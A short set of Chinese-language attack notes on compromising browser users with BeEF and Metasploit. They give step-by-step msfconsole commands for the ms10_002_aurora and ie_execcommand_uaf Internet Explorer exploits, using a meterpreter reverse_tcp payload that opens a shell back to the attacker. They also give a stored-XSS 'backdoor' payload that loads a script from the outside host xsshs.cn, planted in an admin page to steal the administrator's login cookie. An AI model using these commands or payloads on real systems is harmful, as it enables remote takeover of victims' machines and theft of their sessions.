(ie6 xp)
kali 1.0自带beef和msf
cd /usr/share/beef-xss
./beef
访问UI url,账号密码都是beef
配置msf
msfconsole
use windows/browser/ms10_002_aurora
set PAYLOAD windows/meterpreter/reverse_tcp 回连
set SRVHOST ip地址 客户端访问的目标地址
set SRVPOST 7777
set URIPATH /
set LHOST ip地址 本地接收的地址
set LPORT 4444
exploit
随后会生成一个我们设置的:ip:7777的地址,这是要让用户访问的url。
触发漏洞后会回连我们的地址:ip:4444
此时beef就能监听到
msf: sessions -i
sessions -i -
shell
(ie 7\8\9)
use exploit/windows/browser/ie_execcommand_uaf
set SRVHOST ip
set SRVPOST 8888
set URIPATH /
exploit
留后门:</tExtArEa>'"><sCRiPt sRC=//xsshs.cn/2rQH></sCrIpT>
将该代码放入管理员页面里。
此后管理员每次登录我们都能拿到cookie。
xss扫描工具:wvs\椰树\safe3\Xelenium\w3af\vega\xss扫描插件+burp